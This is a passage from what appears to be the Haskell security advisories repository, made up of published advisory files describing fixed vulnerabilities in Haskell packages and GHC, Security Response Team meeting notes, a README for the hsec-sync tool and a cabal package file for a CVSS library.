[[references]] 17 | type = "REPORT" 18 | url = "https://eprint.iacr.org/2020/1484" 19 | [[references]] 20 | type = "ADVISORY" 21 | url = "https://github.com/biscuit-auth/biscuit/security/advisories/GHSA-75rw-34q6-72cr" 22 | 23 | ``` 24 | 25 | # Improper Verification of Cryptographic Signature 26 | 27 | The Biscuit specification version 1 contains a vulnerable algorithm that allows 28 | malicious actors to forge valid Γ-signatures. Such an attack would allow an 29 | attacker to create a token with any access level. The version 2 of the 30 | specification mandates a different algorithm than gamma signatures and as such 31 | is not affected by this vulnerability. 32 | -------------------------------------------------------------------------------- /meeting-notes/2024-06-26.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-06-26 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-06-12.md 5 | 6 | ## GHC numeric bugs [#210](https://github.com/haskell/security-advisories/issues/210) 7 | 8 | - Tristan will prepare advisory 9 | 10 | - For the aarch64 / powerpc issues, these are not base but compiler. 11 | - advisory content would live in `advisories/ghc/compiler`, e.g. 12 | - we need to decide and document the "component" names in the `ghc` namespace 13 | - e.g. `compiler`, `GHCi`, `RTS` 14 | - And we will also need to update our OSV generation code to read the 15 | files in the `ghc` subdir and generate the correct osv, using the `GHC` 16 | namespace and the recognised component names. 17 | - We are up to `HSEC-2024-0006` (0004 and 0005 have been reserved) 18 | 19 | ## Snapshot PR 20 | 21 | - Gautier addressed the review comments; Fraser is still 22 | reviewing the updates. 23 | 24 | ## GitHub integration 25 | 26 | - Gautier will reach out to others who already looked at or 27 | thought about this. 28 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0007.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0007" 4 | cwe = [194] 5 | keywords = ["integrity", "dos", "historical"] 6 | 7 | [[affected]] 8 | ghc-component = "ghc" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "9.2.4" 13 | fixed = "9.2.5" 14 | 15 | [[affected.versions]] 16 | introduced = "9.4.2" 17 | fixed = "9.4.3" 18 | 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/22282" 22 | 23 | [[references]] 24 | type = "FIX" 25 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/9152" 26 | 27 | [[references]] 28 | type = "FIX" 29 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/9139" 30 | ``` 31 | 32 | # Sign extension error in the AArch64 NCG 33 | 34 | Arithmetic operations may result in incorrect runtime results on the native aarch64 backend. 35 | For the most part, this bug only causes availability and data integrity issues. 36 | However, in some circumstances, it may result in other, more complicated security related flaws, such as buffer overflow conditions. 37 | -------------------------------------------------------------------------------- /meeting-notes/2025-01-08.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-01-08 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-12-11.md 5 | 6 | ## Topics for quarterly report 7 | 8 | - (Actually just Nov + Dec) 9 | - Advisory database 10 | - no new advisories 11 | - one change for a git-annex introduced version (needed to 12 | "introduced from beginning" indication - required for 13 | Flora.pm) 14 | - OSV JSON schema validation 15 | (https://github.com/haskell/security-advisories/pull/254) 16 | - Renovate support (Janus) 17 | - Advisory HTML page layout improvement (Gautier) 18 | - Outstanding efforts 19 | - CVSS 4.0 support 20 | - OSV feedback and user journey 21 | (https://github.com/haskell/security-advisories/issues/252) 22 | 23 | ## GitHub OSSF opportunity 24 | 25 | - Gautier put it to Discourse 26 | - Opportunity closed early January 27 | 28 | ## New meeting time 29 | 30 | - Every 2nd meeting (starting in 2 weeks - Wed 2025-01-22 or Thu 31 | 2025-01-23) to be in an APAC-friendly time. Aiming for EU 32 | overlap. 33 | - Lei to propose time on mailing list. 34 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0001" 4 | cwe = [328, 400] 5 | keywords = ["json", "dos", "historical"] 6 | aliases = ["CVE-2022-3433"] 7 | 8 | [[affected]] 9 | package = "aeson" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" 11 | 12 | [[affected.versions]] 13 | introduced = "0.4.0.0" 14 | fixed = "2.0.1.0" 15 | 16 | [[references]] 17 | type = "ARTICLE" 18 | url = "https://cs-syd.eu/posts/2021-09-11-json-vulnerability" 19 | [[references]] 20 | type = "ARTICLE" 21 | url = "https://frasertweedale.github.io/blog-fp/posts/2021-10-12-aeson-hash-flooding-protection.html" 22 | [[references]] 23 | type = "DISCUSSION" 24 | url = "https://github.com/haskell/aeson/issues/864" 25 | ``` 26 | 27 | # Hash flooding vulnerability in aeson 28 | 29 | *aeson* was vulnerable to hash flooding (a.k.a. hash DoS). The 30 | issue is a consequence of the HashMap implementation from 31 | *unordered-containers*. It results in a denial of service through 32 | CPU consumption. This technique has been used in real-world attacks 33 | against a variety of languages, libraries and frameworks over the 34 | years. 35 | -------------------------------------------------------------------------------- /code/hsec-sync/README.md: -------------------------------------------------------------------------------- 1 | # hsec-sync 2 | 3 | Synchronize with the [Haskell advisories database](https://github.com/haskell/security-advisories). 4 | 5 | ## Building 6 | 7 | We aim to support both regular cabal-based and nix-based builds. 8 | 9 | ## Design 10 | 11 | [hsec-tools](../hsec-tools/) is the main entry point for dealing with [security advisories](https://github.com/haskell/security-advisories). 12 | 13 | Libraries implementors and services providers will mainly be interested by 14 | `Security.Advisories.Queries` and `hsec-tools query` which allows querying 15 | against a directory containing the advisories. 16 | 17 | There are two ways for maintaining this local directory up-to-date: 18 | 19 | * Manually (based on `git` of fetching archive from GitHub) 20 | * Relying on `hsec-sync` (either via `Security.Advisories.Sync.sync` or `hsec-sync sync`) 21 | 22 | ![overview](./overview.png) 23 | 24 | The recommended workflow is: 25 | 26 | 1. Use `hsec-sync` to ensure having an up-to-date advisories directory (created or updated) 27 | 2. Use `hsec-tools` to perform queries against it 28 | 29 | ![recommended-workflow](./recommended-workflow.png) 30 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0012.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0012" 4 | cwe = [200] 5 | keywords = ["historical"] 6 | 7 | [[affected]] 8 | package = "git-annex" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" 10 | [[affected.versions]] 11 | introduced = "0.20110417" 12 | fixed = "6.20160419" 13 | 14 | [[references]] 15 | type = "ADVISORY" 16 | url = "https://git-annex.branchable.com/security/checksum_exposure_to_encrypted_special_remotes/" 17 | [[references]] 18 | type = "FIX" 19 | url = "http://source.git-annex.branchable.com/?p=source.git;a=commitdiff;h=b890f3a53d936b5e40aa9acc5876cb98f18b9657" 20 | ``` 21 | 22 | # *git-annex* checksum exposure to encrypted special remotes 23 | 24 | A bug exposed the checksum of annexed files to encrypted special 25 | remotes, which are not supposed to have access to the checksum of 26 | the un-encrypted file. This only occurred when resuming uploads to 27 | the encrypted special remote, so it is considered a low-severity 28 | security hole. 29 | 30 | For details, see commit `b890f3a53d936b5e40aa9acc5876cb98f18b9657`. 31 | 32 | No CVE was assigned for this issue. 33 | 34 | Fixed in *git-annex-6.20160419*. 35 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0004.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0004" 4 | cwe = [776] 5 | keywords = ["xml", "dos", "historical"] 6 | aliases = ["CVE-2021-4249", "VDB-216204"] 7 | 8 | [[affected]] 9 | package = "xml-conduit" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" 11 | 12 | [[affected.versions]] 13 | introduced = "0.5.0" 14 | fixed = "1.9.1.0" 15 | 16 | [[references]] 17 | type = "FIX" 18 | url = "https://github.com/snoyberg/xml/pull/161" 19 | [[references]] 20 | type = "FIX" 21 | url = "https://github.com/snoyberg/xml/commit/4be1021791dcdee8b164d239433a2043dc0939ea" 22 | ``` 23 | 24 | # xml-conduit unbounded entity expansion 25 | 26 | A vulnerability was found in *xml-conduit*. It has been classified 27 | as problematic. Affected is an unknown function of the file 28 | `xml-conduit/src/Text/XML/Stream/Parse.hs` of the component DOCTYPE 29 | Entity Expansion Handler. The manipulation leads to infinite loop. 30 | It is possible to launch the attack remotely. Upgrading to version 31 | 1.9.1.0 is able to address this issue. The name of the patch is 32 | `4be1021791dcdee8b164d239433a2043dc0939ea`. It is recommended to 33 | upgrade the affected component. 34 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0001.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0001" 4 | cwe = [79] 5 | keywords = ["http", "xss", "rxss", "historical"] 6 | 7 | [[references]] 8 | type = "FIX" 9 | url = "https://github.com/snoyberg/keter/pull/246" 10 | 11 | [[affected]] 12 | package = "keter" 13 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N" 14 | declarations."Keter.Proxy.toResponse" = ">= 0.3.4 && < 1.0.1" 15 | declarations."Keter.Proxy.unknownHostResponse" = ">= 1.0.1 && < 1.8.4" 16 | 17 | [[affected.versions]] 18 | introduced = "0.3.4" 19 | fixed = "1.8.4" 20 | ``` 21 | 22 | # Reflected XSS vulnerability in keter 23 | 24 | Keter is an app-server/reverse-proxy often used with webapps build on Yesod web-framework. 25 | 26 | In the logic handling VHost dispatch, Keter was echoing back `Host` header value, unescaped, 27 | as part of an HTML error page. This constitutes a reflected-XSS vulnerability. Although 28 | not readily exploitable directly from a browser (where `Host` header can't generally assume 29 | arbitrary values), it may become such in presence of further weaknesses in components 30 | upstream of Keter in the http proxying chain. Therefore, AC:High in CVSS evaluation. 31 | -------------------------------------------------------------------------------- /meeting-notes/2024-03-06.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-03-06 2 | 3 | - Previous meeting: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-02-21.md 5 | 6 | ## pre-ZuriHac ecosystem workshop 7 | 8 | - 6-7 June (before ZuriHac) 9 | - https://haskell.foundation/events/2024-haskell-ecosystem-workshop.html 10 | - Registration is open; fee can be waived for SRT members 11 | - SRT members attending: 12 | - Gautier confirmed, others looking into it. 13 | - Jose wants all of us to attend, if we can. 14 | Other SRT members want to come but need to work out if we can. 15 | 16 | 17 | ## Other updates (things that happened) 18 | 19 | - Update hsec-tools to toml-parser v2 20 | - Fixed web advisory index publishing. 21 | - One historical advisory added (external contributor) 22 | - Mihai has approval to publish the GHA documentation/guide. 23 | He will send to SRT list first, then to researcher. 24 | 25 | ## Outstanding PRs 26 | 27 | - CWE module 28 | ([#116](https://github.com/haskell/security-advisories/pull/116)) 29 | 30 | ## Other work to be done 31 | 32 | - Publishing our libraries on Hackage. 33 | - What is the state of our package docs? Might need some work... 34 | -------------------------------------------------------------------------------- /meeting-notes/2024-08-07.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-08-07 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-07-24.md 5 | 6 | ## Embargoed vulnerability work 7 | 8 | We contacted the affected maintainers and we are coordinating the disclosure. 9 | 10 | ## haskell.org crlf injection vulnerability 11 | 12 | Divya Singh reported a vulnerability on the haskell.org website that has been fixed by upgrading the apache package. 13 | 14 | ## CVSS version 4.0 [#208](https://github.com/haskell/security-advisories/pull/208) 15 | 16 | @unorsk added support for the latest Common Vulnerability Scoring System. 17 | 18 | ## haskell.org blog and security advisories 19 | 20 | We discussed about posting security update news to the upcoming haskell.org blog. 21 | 22 | ## Call for Volunteers 23 | 24 | The draft is still in progress. 25 | 26 | ## GitHub Action cabal-audit scan 27 | 28 | * Gautier has start to work on a [GitHub Action](https://github.com/blackheaven/haskell-security-action) which aims to run `cabal audit` 29 | * Still under development, most of the code is done (i.e. push results to the security section of the repository) 30 | * Packaging issues mainly for the moment 31 | -------------------------------------------------------------------------------- /meeting-notes/2024-11-13.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-11-13 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-10-30.md 5 | 6 | ## Q3(+) report 7 | 8 | The report is proposed: [#244](https://github.com/haskell/security-advisories/pull/244). We will reproduce it on Discourse tomorrow, and submit a PR to update https://www.haskell.org/security/. 9 | 10 | ## SRT Process 11 | 12 | We should document more thoroughly the SRT processes 13 | (administrative), particularly since we went through our first 14 | vacancy->new appointments cycle. 15 | 16 | ## GHC Math bugs 17 | 18 | The advisories are updated and available for review: [#214](https://github.com/haskell/security-advisories/pull/214) 19 | 20 | ## flora integration 21 | 22 | [flora](https://github.com/flora-pm/flora-server/) has pinged Gautier and Fraser 23 | regarding [security advisories integration PR#762](https://github.com/flora-pm/flora-server/pull/762). 24 | 25 | After a discussion between Gautier and Hecate (the maintainer), flora will 26 | integrate advisories search and the decision was made to replicate the advisories 27 | structure in PostGreSQL. 28 | 29 | Perhaps we should recommend to use the OSV export? 30 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0005.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0005" 4 | cwe = [295] 5 | keywords = ["x509", "pki", "mitm", "historical"] 6 | aliases = ["CVE-2013-0243"] 7 | 8 | [[affected]] 9 | package = "tls-extra" 10 | cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" 11 | 12 | [[affected.versions]] 13 | introduced = "0.1.0" 14 | fixed = "0.4.6.1" 15 | 16 | [[references]] 17 | type = "DISCUSSION" 18 | url = "https://www.openwall.com/lists/oss-security/2013/01/30/6" 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://github.com/haskell-tls/hs-tls/issues/29" 22 | [[references]] 23 | type = "FIX" 24 | url = "https://github.com/haskell-tls/hs-tls/commit/15885c0649ceabd2f4d2913df8ac6dc63d6b3b37" 25 | ``` 26 | 27 | # tls-extra: certificate validation does not check Basic Constraints 28 | 29 | *tls-extra* does not check the Basic Constraints extension of a 30 | certificate in certificate chain processing. Any certificate is 31 | treated as a CA certificate. As a consequence, anyone who has a 32 | valid certificate can use it to sign another one (with an arbitrary 33 | subject DN/domain name embedded into it) and have it accepted by 34 | *tls*. This allows MITM attacks on TLS connections. 35 | -------------------------------------------------------------------------------- /advisories/published/2023/HSEC-2023-0014.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2023-0014" 4 | keywords = ["file write"] 5 | aliases = ["CVE-2023-35936", "GHSA-xj5q-fv23-575g"] 6 | cwe = [20] 7 | 8 | [[references]] 9 | type = "REPORT" 10 | url = "https://github.com/jgm/pandoc/security/advisories/GHSA-xj5q-fv23-575g" 11 | 12 | [[affected]] 13 | package = "pandoc" 14 | cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:L" 15 | 16 | [[affected.versions]] 17 | introduced = "1.13" 18 | fixed = "3.1.4" 19 | 20 | ``` 21 | # Arbitrary file write is possible when using PDF output or --extract-media with untrusted input 22 | 23 | Pandoc is susceptible to an arbitrary file write vulnerability, which can be triggered by providing a specially crafted image element in the input when generating files using the --extract-media option or outputting to PDF format. This vulnerability allows an attacker to create or overwrite arbitrary files on the system (depending on the privileges of the process running pandoc). 24 | 25 | This vulnerability only affects systems that (a) pass untrusted user input to pandoc and (b) allow pandoc to be used to produce a PDF or with the --extract-media option. 26 | 27 | The vulnerability is patched in pandoc 3.1.4. 28 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0006.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0006" 4 | keywords = ["crypto"] 5 | cwe = [403] 6 | 7 | [[references]] 8 | type = "FIX" 9 | url = "https://github.com/kazu-yamamoto/crypton-certificate/commit/e353d450c381c9d6b903c4257927e0c89c97acb1" 10 | 11 | [[affected]] 12 | package = "x509-store" 13 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" 14 | [[affected.versions]] 15 | introduced = "0.1" 16 | 17 | [[affected]] 18 | package = "crypton-x509-store" 19 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" 20 | [[affected.versions]] 21 | introduced = "1.6.9" 22 | fixed = "1.6.12" 23 | ``` 24 | 25 | # Private key leak via inherited file descriptor 26 | 27 | The X.509 key reading function `readKeyFile` opened a file 28 | descriptor to the private key without setting the *close-on-exec* 29 | flag. If a child process is `exec`ed at the same time, it would 30 | inherit that file descriptor and could read the private key 31 | material. 32 | 33 | Impact is limited to child processes that run untrusted code, but 34 | that do not close inherited file descriptors. (For example, the 35 | `su(1)` command.) 36 | 37 | This leak was fixed by setting the *close-on-exec* flag on 38 | unix-based systems. 39 | -------------------------------------------------------------------------------- /meeting-notes/2024-01-10.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-01-10 2 | 3 | Previous meeting notes: https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-12-13.md 4 | 5 | 6 | ## 2023 H2 report 7 | 8 | - Draft sent to list; thanks for reviews. FT will publish today. 9 | 10 | ## ZuriHac plans 11 | 12 | - We agree it's a good idea to have a project, e.g. `cabal audit`, Hackage server. 13 | - Timeline: Jan for concept, March for concrete budget. 14 | - Jose has contact points with cabal-install and HLS. hackage-server seems somewhat unloved. 15 | - Maybe we prioritise getting hackage-server attention? 16 | - Many security improvment should/could be done (e.g. 2FA) 17 | - Can continue the discussion on list or GH issue (public). 18 | 19 | ## Oustanding PRs 20 | 21 | - CWE library support. 22 | 23 | ## Downstream toolling 24 | 25 | - Tristan already started something regarding tracking function calls 26 | https://github.com/TristanCacqueray/cabal-audit 27 | - Support to suppress false positives will be important, esp. because we have >0 advisories for *base*. This could be VEX and/or some other mechanism. 28 | 29 | ## Publishing the HTML advisory index 30 | 31 | - Mihai: I was planning to look into the GHA but didn't get a chance yet 32 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0009.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0009" 4 | keywords = ["biscuit"] 5 | aliases = ["CVE-2024-41949", "GHSA-rgqv-mwc3-c78m", "GHSA-47cq-pc2v-3rmp"] 6 | 7 | [[references]] 8 | type = "ADVISORY" 9 | url = "https://github.com/biscuit-auth/biscuit-haskell/security/advisories/GHSA-47cq-pc2v-3rmp" 10 | [[references]] 11 | type = "FIX" 12 | url = "https://github.com/biscuit-auth/biscuit-haskell/pull/93" 13 | 14 | [[affected]] 15 | package = "biscuit-haskell" 16 | cvss = "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:L/A:N" 17 | 18 | [[affected.versions]] 19 | introduced = "0.3.0.0" 20 | fixed = "0.4.0.0" 21 | ``` 22 | 23 | # Public key confusion in third-party blocks 24 | 25 | Third-party blocks can be generated without transferring the whole token to the third-party authority. Instead, a `ThirdPartyBlock` request can be sent, providing only the necessary info to generate a third-party block and to sign it: 26 | 27 | - the public key of the previous block (used in the signature); 28 | - the public keys part of the token symbol table (for public key interning in datalog expressions). 29 | 30 | A third-party block request forged by a malicious user can trick the third-party authority into generating datalog trusting the wrong keypair. 31 | -------------------------------------------------------------------------------- /meeting-notes/2025-02-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-02-20 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-02-05.md 5 | 6 | Attended: Gautier, Lei, Tristan, Fraser 7 | 8 | ## Tooling - GHC 9.10 and GHC 9.12 support 9 | 10 | - 9.10 support still depends on update to the 11 | [`feed`](https://hackage.haskell.org/package/feed) package. 12 | Probably just a *base* bounds nudge is needed, e.g. via metadata 13 | revision. 14 | - 9.12 needs CI updates. And also `feed`. And what else? We don't 15 | know yet :) 16 | - haskell-ci refresh probably needed 17 | - Gautier will take a look at it. 18 | 19 | ## ZuriHac / Ecosystem Workshop 20 | 21 | - Ecosystem Workshop Friday 6 June 22 | - https://haskell.foundation/events/2025-haskell-implementors-workshop.html 23 | - ZuriHac Saturday 7 .. Monday 9 June 24 | - https://zfoh.ch/zurihac2025/ 25 | - Gautier will attend ZuriHac, not the workshop 26 | - Tristan is not able to commit 27 | - Fraser is not sure yet (it's 50/50). 28 | 29 | ## List spam 30 | 31 | - It's a shame... 32 | - Can we allow-list the SRT members and other stakeholders? 33 | 34 | ## Meeting calendar 35 | 36 | - FT will check with Jose if he can update the events. 37 | - Otherwise, artisanal hand-crafted iCalendar events :) 38 | -------------------------------------------------------------------------------- /meeting-notes/2023-10-18.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2023-10-18 2 | 3 | [Previous meeting notes](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-10-04.md) 4 | 5 | ## Present 6 | 7 | - Tristan, Gautier and Fraser 8 | 9 | ## Previous AIs 10 | 11 | - PR have been merged 12 | 13 | ## Remaining work to be merged 14 | 15 | - CWE and CVSS validation and data type 16 | - Work on GitHub workflow automation enhancement can proceed when this has been merged. 17 | - FT: As far as I know, we have to pursue a webhook or "bot" approach 18 | rather than exeucting behaviour within webhooks, because PRs from 19 | forks do not have privileged tokens. 20 | - Tristan: what about issues? Do actions triggered by issues have the needed permissions? 21 | - OpenStack CI has a concept of config job which can run with privileged on untrusted project. 22 | 23 | ## Downstream tooling 24 | 25 | - David's post calling for action: 26 | https://discourse.haskell.org/t/would-you-like-to-write-a-security-advisory-analyzer/7638 27 | - Gautier: community contribution that was merged as part of the `check` command: https://github.com/blackheaven/security-advisories/pull/2 28 | 29 | ## Outstanding embargoed issue 30 | 31 | - Follow up with Mihai if he knows the status. We might 32 | set a date for disclosure and advise downstream and upstream 33 | -------------------------------------------------------------------------------- /code/cvss/cvss.cabal: -------------------------------------------------------------------------------- 1 | cabal-version: 2.4 2 | name: cvss 3 | version: 0.2.0.1 4 | synopsis: Common Vulnerability Scoring System. 5 | description: 6 | Use this library to parse CVSS string and compute its score. 7 | 8 | license: BSD-3-Clause 9 | author: Tristan de Cacqueray 10 | maintainer: tdecacqu@redhat.com 11 | category: Data 12 | extra-doc-files: CHANGELOG.md, README.md 13 | tested-with: 14 | GHC ==8.10.7 || ==9.0.2 || ==9.2.8 || ==9.4.8 || ==9.6.6 || ==9.8.3 || ==9.10.1 || ==9.12.1 15 | 16 | library 17 | exposed-modules: Security.CVSS 18 | build-depends: 19 | , base >=4.14 && <5 20 | , text >=1.2 && <3 21 | 22 | hs-source-dirs: src 23 | default-language: Haskell2010 24 | ghc-options: 25 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 26 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 27 | 28 | test-suite spec 29 | type: exitcode-stdio-1.0 30 | hs-source-dirs: test 31 | main-is: Spec.hs 32 | build-depends: 33 | , base <5 34 | , cvss 35 | , tasty <2 36 | , tasty-hunit <1.0 37 | , text 38 | 39 | default-language: Haskell2010 40 | ghc-options: 41 | -Wall -Wcompat -Widentities -Wincomplete-record-updates 42 | -Wincomplete-uni-patterns -Wpartial-fields -Wredundant-constraints 43 | -------------------------------------------------------------------------------- /meeting-notes/2023-08-23.md: -------------------------------------------------------------------------------- 1 | # SRT 2023-08-23 2 | 3 | [Previous meeting](https://github.com/haskell/security-advisories/blob/main/meeting-notes/2023-08-09.md) 4 | 5 | Present: 6 | * Gautier 7 | * Mihai 8 | * Casey 9 | * Tristan 10 | * david 11 | 12 | # Previous action items 13 | 14 | 15 | * Bitwarden accounts? 16 | * Mihai and Casey have access and are confirmed 17 | 18 | * Mihai: 19 | 20 | * Progress on embargoed items 21 | * The repo now contains the distribution list for who to send embargoed items to 22 | * Look into GHCup #858 -- still in progress 23 | * Mostly done, need to decide whether to send private email or reply on issue 24 | 25 | * Tristan: rebase the toml-parser PR#88 26 | * Done, this is now ready to review 27 | 28 | * David: Encourage Pandoc devs to test out our advisory process 29 | * Done: HSEC-2023-0014 30 | 31 | * FT: Documentation of repo structure 32 | 33 | * FT: Diagnostic output (created file XYZ) 34 | 35 | * FT to publish PR for (currently WIP) enhancement to record package components in HSEC security-advisories 36 | 37 | # HSEC-2023-0014 38 | 39 | * First advisory contribution: https://github.com/haskell/security-advisories/pull/115 40 | 41 | # CWE Library 42 | 43 | * Tristan proposed a new library to resolve CWE id and make advisory more readable: https://github.com/haskell/security-advisories/pull/116 44 | -------------------------------------------------------------------------------- /meeting-notes/2025-03-20.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2025-03-20 2 | 3 | Present: Gautier, Fraser 4 | 5 | Previously: 6 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2025-02-20.md 7 | 8 | ## Thank-yous 9 | 10 | - Thanks Tristan for handling HSEC-2025-0001. 11 | - Thanks Gautier for completing support for GHC 9.10, 12 | by switching from *feed* to *atom-conduit*. 13 | - 9.12 PR is ready for review. 14 | 15 | ## ZuriHac + Ecosystem Workshop 16 | 17 | - Gautier confirmed his attendence for the full event. 18 | - FT still a maybe. 19 | 20 | ## HSEC-2024-000{6,7,8} 21 | 22 | - 2025-0001 reminded me of the outstanding PR for the GHC numeric bugs: 23 | [#214](https://github.com/haskell/security-advisories/pull/214). 24 | - IIRC, the delay was to get the tool support for GHC 25 | (cf Hackage) ecosystem in place. This is all sorted now; 26 | e.g. see https://osv.dev/vulnerability/HSEC-2025-0001. 27 | - Let's merge it? 28 | 29 | ## Conf presentation - Security response for open source ecosystems 30 | 31 | - FT will present at CrikeyCon this weekend. 32 | - https://crikeycon.com/schedule/ 33 | - I will circulate the slide deck for review tomorrow - feedback welcome. 34 | 35 | ## Mailing list delivery issues? 36 | 37 | - FT: Did anyone else get a big burst of delayed mail yesterday/this 38 | morning? 39 | - Confirmed - but I guess it's fixed now :) 40 | -------------------------------------------------------------------------------- /advisories/published/2024/HSEC-2024-0006.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2024-0006" 4 | cwe = [192] 5 | keywords = ["integrity", "dos", "historical"] 6 | 7 | [[affected]] 8 | package = "base" 9 | cvss = "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H" 10 | 11 | [[affected.versions]] 12 | introduced = "4.15.0.0" 13 | fixed = "4.15.1.0" 14 | 15 | [[references]] 16 | type = "REPORT" 17 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/19345" 18 | 19 | [[references]] 20 | type = "REPORT" 21 | url = "https://gitlab.haskell.org/ghc/ghc/-/issues/20066" 22 | 23 | [[references]] 24 | type = "FIX" 25 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/4980" 26 | 27 | [[references]] 28 | type = "FIX" 29 | url = "https://gitlab.haskell.org/ghc/ghc/-/merge_requests/6109" 30 | ``` 31 | 32 | # `fromIntegral`: conversion error 33 | 34 | `fromIntegral` may result in coercion errors when used with optimization flags `-O1` or `-O2` 35 | in the following situation: 36 | 37 | - Converting negative `Int` to `Natural` does not throw an arithmetic underflow error 38 | - Converting large `Integer` greater than 2^64 to `Natural` overflow. 39 | 40 | For the most part, these errors in and of themselves result only in availability and data integrity issues. 41 | However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions. 42 | -------------------------------------------------------------------------------- /advisories/published/2025/HSEC-2025-0003.md: -------------------------------------------------------------------------------- 1 | ```toml 2 | [advisory] 3 | id = "HSEC-2025-0003" 4 | cwe = [416] 5 | keywords = ["corruption", "vendored-code", "language-c"] 6 | aliases = ["CVE-2025-31115"] 7 | 8 | [[references]] 9 | type = "ARTICLE" 10 | url = "https://tukaani.org/xz/threaded-decoder-early-free.html" 11 | 12 | [[references]] 13 | type = "FIX" 14 | url = "https://github.com/tukaani-project/xz/commit/d5a2ffe41bb77b918a8c96084885d4dbe4bf6480" 15 | 16 | [[references]] 17 | type = "FIX" 18 | url = "https://github.com/hasufell/lzma-static/commit/e95fe96530568addfc83b771900025053e2c6951" 19 | 20 | [[affected]] 21 | package = "xz-clib" 22 | cvss = "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" 23 | 24 | [[affected.versions]] 25 | introduced = "5.6.3" 26 | fixed = "5.8.1" 27 | ``` 28 | 29 | # Use after free in multithreaded lzma (.xz) decoder 30 | 31 | In XZ Utils 5.3.3alpha to 5.8.0, the multithreaded .xz decoder in 32 | liblzma has a bug where invalid input can at least result in a crash 33 | (CVE-2025-31115). The effects include heap use after free and 34 | writing to an address based on the null pointer plus an offset. 35 | Applications and libraries that use the `lzma_stream_decoder_mt` 36 | function are affected. 37 | 38 | The Haskell *xz-clib* library vendors and builds the C 39 | implementation. The *xz* package does not use the multithreaded 40 | decoder and is therefore unaffected. 41 | -------------------------------------------------------------------------------- /meeting-notes/2024-06-12.md: -------------------------------------------------------------------------------- 1 | # SRT meeting 2024-06-12 2 | 3 | Previously: 4 | https://github.com/haskell/security-advisories/blob/main/meeting-notes/2024-05-29.md 5 | 6 | ## haskell.org security page 7 | 8 | There is now https://www.haskell.org/security/ 9 | 10 | We still need to configre subdomains so advisories (which was redesigned to be compliant with Haskell Foundation design) index is automatically updated. 11 | 12 | ## CVSS Version 4 13 | 14 | Initial PR to support CVSS Version 4 [#208](https://github.com/haskell/security-advisories/pull/208) 15 | 16 | ## Fixed git timestamp parsing logic 17 | 